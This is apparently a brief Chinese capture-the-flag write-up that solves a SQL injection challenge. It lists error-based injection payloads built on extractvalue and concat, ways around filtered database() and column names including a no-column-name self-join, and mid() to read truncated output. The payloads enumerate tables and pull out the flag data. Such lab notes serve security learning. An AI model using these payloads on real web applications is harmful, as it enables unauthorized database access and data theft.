测试发现database()被过滤了,用1’-a()#爆出库名这里试一下
1’ || extractvalue(0,concat(0x7e,1,0x7e));#回显1
1’ || extractvalue(0,concat(0x7e,mid((select group_concat(table_name) from information_schema.tables where table_schema like ‘sqlsql’),1,30),0x7e));#
得到Fal_flag,output
这里发现column也被禁用了,用无列注入
-1’||extractvalue(1,concat(0x7e,(select *from (select *from output a join output b)c)))#
查到data查data
-1’||extractvalue(1,concat(0x7e,(select data from output)))#
只显示了一半用mid截取
-1’||extractvalue(1,concat(0x7e,mid((select data from output),20)))#
